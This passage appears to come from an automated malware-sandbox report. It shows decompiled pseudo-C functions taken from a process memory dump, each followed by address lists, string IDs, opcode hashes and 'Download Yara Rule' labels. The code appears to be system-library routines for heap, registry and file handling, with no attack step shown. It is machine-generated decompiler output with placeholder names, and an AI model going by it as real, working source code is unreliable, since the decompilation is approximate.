						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0138138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E012E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0137FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x13b8724 & 0x00000008) != 0) {
						E013852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013915B5(0x13b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                            0x01390eb7
                                                            0x01390eb9
                                                            0x01390ec0
                                                            0x01390ec2
                                                            0x01390ecd
                                                            0x0139105b
                                                            0x0139105b
                                                            0x01391061
                                                            0x01391066
                                                            0x01391066
                                                            0x0139106b
                                                            0x01391073
                                                            0x01391073
                                                            0x01390ed3
                                                            0x01390ed6
                                                            0x01390edc
                                                            0x01390ee0
                                                            0x01390ee7
                                                            0x01390ef0
                                                            0x01390ef5
                                                            0x01390efa
                                                            0x01390efc
                                                            0x01390efd
                                                            0x01390f03
                                                            0x01390f04
                                                            0x01390f06
                                                            0x01390f07
                                                            0x01390f09
                                                            0x01390f0e
                                                            0x01390f14
                                                            0x01390f23
                                                            0x01390f2d
                                                            0x01390f34
                                                            0x01390f34
                                                            0x01390f14
                                                            0x01390f52
                                                            0x00000000
                                                            0x00000000
                                                            0x01390f58
                                                            0x01390f73
                                                            0x01390f74
                                                            0x01390f79
                                                            0x01390f7d
                                                            0x01390f80
                                                            0x01390f86
                                                            0x01390fab
                                                            0x01390fb5
                                                            0x01390fc6
                                                            0x01390fd1
                                                            0x01390fe3
                                                            0x01390fd3
                                                            0x01390fdc
                                                            0x01390fdc
                                                            0x01390feb
                                                            0x01391009
                                                            0x01391009
                                                            0x01391015
                                                            0x01391027
                                                            0x01391017
                                                            0x01391020
                                                            0x01391020
                                                            0x0139102f
                                                            0x0139103c
                                                            0x0139103c
                                                            0x01391048
                                                            0x01391050
                                                            0x01391050
                                                            0x01391055
                                                            0x00000000
                                                            0x01391055
                                                            0x01390f88
                                                            0x01390f9e
                                                            0x01390fa2
                                                            0x01390fa9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x01390fa9
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-2679148245
                                                            • Opcode ID: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
                                                            • Instruction ID: c93c79fe4b9393e8103518899daf208eb72a4ba90229758b42154777861d537a
                                                            • Opcode Fuzzy Hash: ec3281c7a1d6b69d01c34ecc6bce460524a152163ce3c4134a6fa5cae21b35a4
                                                            • Instruction Fuzzy Hash: A751B2713043429FEB25DF28D984B1BBBE9EBC4718F04092DFA9697290D771E909C762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E012FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E012E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01309830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01309990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E013095D0();
							goto L11;
						} else {
							_t109 = L012E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0130F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E013095D0();
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                            0x012ff0d3
                                                            0x012ff0d9
                                                            0x012ff0e0
                                                            0x012ff0e7
                                                            0x012ff0f2
                                                            0x012ff0f4
                                                            0x012ff0f8
                                                            0x012ff100
                                                            0x012ff108
                                                            0x012ff10d
                                                            0x012ff115
                                                            0x012ff116
                                                            0x012ff11f
                                                            0x012ff123
                                                            0x012ff124
                                                            0x012ff12c
                                                            0x012ff130
                                                            0x012ff134
                                                            0x012ff13d
                                                            0x012ff144
                                                            0x012ff14b
                                                            0x012ff152
                                                            0x0133bab0
                                                            0x0133bab0
                                                            0x012ff158
                                                            0x012ff158
                                                            0x012ff15a
                                                            0x012ff160
                                                            0x012ff165
                                                            0x012ff166
                                                            0x012ff16f
                                                            0x012ff173
                                                            0x0133baa7
                                                            0x0133baa7
                                                            0x0133baab
                                                            0x00000000
                                                            0x012ff179
                                                            0x012ff18d
                                                            0x012ff191
                                                            0x0133baa2
                                                            0x00000000
                                                            0x012ff197
                                                            0x012ff19b
                                                            0x012ff1a2
                                                            0x012ff1a9
                                                            0x012ff1af
                                                            0x012ff1b2
                                                            0x012ff1b6
                                                            0x012ff1b9
                                                            0x012ff1c4
                                                            0x012ff1d8
                                                            0x012ff1df
                                                            0x012ff1e3
                                                            0x012ff1eb
                                                            0x012ff1ee
                                                            0x012ff1f4
                                                            0x012ff20f
                                                            0x0133bab7
                                                            0x0133babb
                                                            0x0133bacc
                                                            0x0133bad1
                                                            0x012ff215
                                                            0x012ff218
                                                            0x012ff226
                                                            0x012ff22b
                                                            0x00000000
                                                            0x012ff22b
                                                            0x012ff1f6
                                                            0x012ff1f6
                                                            0x012ff1f9
                                                            0x012ff1fb
                                                            0x012ff1fb
                                                            0x012ff1f4
                                                            0x012ff191
                                                            0x012ff173
                                                            0x012ff152
                                                            0x012ff203

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction ID: 1d277d87cd824bed432633d2e8df5c4e6b0de07c5a4184816d40f47b7eccf36e
                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction Fuzzy Hash: 6B517A72514711AFD321DF29C841A6BBBF8FF88714F00892EFA9587690E7B4E914CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01343540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E01343540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x13bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01300BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01343706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0130FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01343540;
						E0130FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0131DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01350C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E013097C0();
					}
					return E0130B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01343971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01343884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0130FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01309650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01343787(_a4,  &_v352, _t80);
						}
					}
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E013095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                            0x01343552
                                                            0x0134355a
                                                            0x0134355d
                                                            0x01343566
                                                            0x01343567
                                                            0x0134357e
                                                            0x0134358f
                                                            0x013435a1
                                                            0x013435a5
                                                            0x0134366b
                                                            0x0134366b
                                                            0x0134366d
                                                            0x01343672
                                                            0x01343679
                                                            0x01343685
                                                            0x0134368d
                                                            0x0134369d
                                                            0x013436a7
                                                            0x013436b8
                                                            0x013436c6
                                                            0x013436c7
                                                            0x013436dc
                                                            0x013436e1
                                                            0x013436e7
                                                            0x013436e9
                                                            0x013436e9
                                                            0x01343703
                                                            0x01343703
                                                            0x013435b5
                                                            0x013435c0
                                                            0x013435c4
                                                            0x00000000
                                                            0x00000000
                                                            0x013435ca
                                                            0x013435d7
                                                            0x013435e2
                                                            0x013435e6
                                                            0x013435e8
                                                            0x013435f5
                                                            0x013435fa
                                                            0x01343603
                                                            0x01343604
                                                            0x01343609
                                                            0x0134360a
                                                            0x01343612
                                                            0x01343613
                                                            0x0134361e
                                                            0x01343622
                                                            0x01343628
                                                            0x0134362f
                                                            0x0134362f
                                                            0x01343636
                                                            0x01343638
                                                            0x0134363b
                                                            0x01343642
                                                            0x01343642
                                                            0x01343636
                                                            0x01343657
                                                            0x01343657
                                                            0x0134365c
                                                            0x01343662
                                                            0x01343669
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
                                                            • Instruction ID: 76d2678738640a9d3f898103cfa88d7571e635d777fb134b7e12967a5db55cef
                                                            • Opcode Fuzzy Hash: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
                                                            • Instruction Fuzzy Hash: 3C4167B1D0052D9BDB21DA54CC80FDEB7BCAB54718F0045A5EB08A7281DB34AE88CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E013905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01309730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0138A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0138A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01391293(_t79, _v40, E013907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E012E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0138138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                            0x013905c5
                                                            0x013905ca
                                                            0x013905d3
                                                            0x013906db
                                                            0x013906db
                                                            0x013906dd
                                                            0x013906e3
                                                            0x013906e3
                                                            0x013905dd
                                                            0x013905e7
                                                            0x013905f6
                                                            0x01390600
                                                            0x01390607
                                                            0x01390610
                                                            0x01390615
                                                            0x0139061a
                                                            0x0139061c
                                                            0x0139061e
                                                            0x01390624
                                                            0x01390625
                                                            0x01390627
                                                            0x01390628
                                                            0x01390631
                                                            0x01390640
                                                            0x0139064d
                                                            0x01390654
                                                            0x01390654
                                                            0x01390631
                                                            0x0139066d
                                                            0x01390674
                                                            0x00000000
                                                            0x00000000
                                                            0x01390692
                                                            0x0139069e
                                                            0x013906b0
                                                            0x013906a0
                                                            0x013906a9
                                                            0x013906a9
                                                            0x013906b8
                                                            0x013906d6
                                                            0x013906d6
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-2679148245
                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                            • Instruction ID: 72d979d557a67694706319508b19b8cb7316befe196d8ac25a7ad8142df59588
                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                            • Instruction Fuzzy Hash: AB31B0326043466BEB14DE29CD45F9A7BDDEBC4768F144229BA58AB280D770E904CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01343884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E01343884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01309650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L012E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01309650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                            0x01343893
                                                            0x01343896
                                                            0x01343899
                                                            0x0134389f
                                                            0x013438a0
                                                            0x013438a4
                                                            0x013438a9
                                                            0x013438ac
                                                            0x013438ad
                                                            0x013438ae
                                                            0x013438af
                                                            0x013438b1
                                                            0x013438b4
                                                            0x013438bb
                                                            0x013438bc
                                                            0x013438bd
                                                            0x013438c4
                                                            0x013438c8
                                                            0x013438ca
                                                            0x013438ca
                                                            0x013438d5
                                                            0x0134393e
                                                            0x01343940
                                                            0x01343942
                                                            0x01343952
                                                            0x01343954
                                                            0x01343961
                                                            0x01343961
                                                            0x01343967
                                                            0x0134396e
                                                            0x0134396e
                                                            0x01343947
                                                            0x0134394c
                                                            0x00000000
                                                            0x0134394c
                                                            0x013438ea
                                                            0x013438ee
                                                            0x013438f8
                                                            0x013438f9
                                                            0x013438ff
                                                            0x01343900
                                                            0x01343902
                                                            0x01343903
                                                            0x0134390b
                                                            0x0134390f
                                                            0x01343950
                                                            0x00000000
                                                            0x01343950
                                                            0x01343915
                                                            0x0134391d
                                                            0x0134391d
                                                            0x01343922
                                                            0x01343926
                                                            0x00000000
                                                            0x01343928
                                                            0x0134392b
                                                            0x0134392b
                                                            0x01343935
                                                            0x01343937
                                                            0x01343937
                                                            0x00000000
                                                            0x01343935
                                                            0x01343926
                                                            0x013438f0
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryName
                                                            • API String ID: 0-215506332
                                                            • Opcode ID: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
                                                            • Instruction ID: 74b259491bf3f18dbe125e648b60a387b498e51bb441e70516b7a9ef8ae31649
                                                            • Opcode Fuzzy Hash: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
                                                            • Instruction Fuzzy Hash: F031E53690052ABFEB15DA5CC945E7BFBF4FF40728F014169E915A7291D730AE04C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012FD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 33%
                                                            			E012FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E012E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0130B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E013098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E013095D0();
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                            0x012fd29c
                                                            0x012fd2a6
                                                            0x012fd2b1
                                                            0x012fd2b5
                                                            0x012fd2b6
                                                            0x012fd2bc
                                                            0x012fd2bd
                                                            0x012fd2be
                                                            0x012fd2bf
                                                            0x012fd2c2
                                                            0x012fd2c4
                                                            0x012fd2cc
                                                            0x012fd384
                                                            0x012fd34b
                                                            0x012fd34f
                                                            0x012fd350
                                                            0x012fd351
                                                            0x012fd35c
                                                            0x012fd35c
                                                            0x012fd2d6
                                                            0x012fd2da
                                                            0x012fd2e1
                                                            0x012fd361
                                                            0x012fd369
                                                            0x012fd36d
                                                            0x012fd2e3
                                                            0x012fd2e3
                                                            0x012fd2e3
                                                            0x012fd2e5
                                                            0x012fd2ed
                                                            0x012fd2f5
                                                            0x012fd2fa
                                                            0x012fd302
                                                            0x012fd303
                                                            0x012fd30b
                                                            0x012fd30f
                                                            0x012fd313
                                                            0x012fd318
                                                            0x012fd31c
                                                            0x012fd320
                                                            0x012fd379
                                                            0x012fd37d
                                                            0x00000000
                                                            0x00000000
                                                            0x0133affe
                                                            0x0133b001
                                                            0x0133b011
                                                            0x00000000
                                                            0x012fd322
                                                            0x012fd322
                                                            0x012fd330
                                                            0x012fd337
                                                            0x012fd35d
                                                            0x012fd339
                                                            0x012fd33f
                                                            0x012fd38c
                                                            0x012fd38c
                                                            0x012fd33f
                                                            0x012fd349
                                                            0x00000000
                                                            0x012fd349

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
                                                            • Instruction ID: 1af43cb96eb2f25d9fe40ca478b209d78bc7d6154d60c608bb6272739d1b2e60
                                                            • Opcode Fuzzy Hash: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
                                                            • Instruction Fuzzy Hash: DF31C2B656830A9FC721DF68C981A6BFBE8EB85654F00093EFB9483251D634DD04CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E012D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0130BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0130A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0130A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L012E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                            0x012d1b8f
                                                            0x012d1b9a
                                                            0x012d1b9c
                                                            0x012d1b9e
                                                            0x012d1ba3
                                                            0x01327010
                                                            0x01327010
                                                            0x00000000
                                                            0x012d1ba9
                                                            0x012d1ba9
                                                            0x012d1bae
                                                            0x00000000
                                                            0x012d1bc5
                                                            0x012d1bca
                                                            0x012d1bcf
                                                            0x012d1bd0
                                                            0x012d1bd1
                                                            0x012d1bd2
                                                            0x012d1bd6
                                                            0x012d1bdc
                                                            0x012d1be0
                                                            0x01326ffc
                                                            0x01327000
                                                            0x00000000
                                                            0x01327006
                                                            0x01327009
                                                            0x01327009
                                                            0x012d1be6
                                                            0x012d1bec
                                                            0x012d1c0b
                                                            0x012d1c0b
                                                            0x012d1c0c
                                                            0x012d1c11
                                                            0x012d1c12
                                                            0x012d1c15
                                                            0x012d1c1b
                                                            0x012d1c1f
                                                            0x012d1c31
                                                            0x012d1c33
                                                            0x01327026
                                                            0x01327026
                                                            0x012d1c21
                                                            0x012d1c24
                                                            0x012d1c24
                                                            0x012d1bee
                                                            0x012d1bee
                                                            0x012d1bf2
                                                            0x012d1c3a
                                                            0x012d1bf4
                                                            0x012d1bf4
                                                            0x012d1c05
                                                            0x012d1c05
                                                            0x012d1c09
                                                            0x012d1c3e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012d1c09
                                                            0x012d1bec
                                                            0x012d1be0
                                                            0x012d1bae
                                                            0x012d1c2e

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
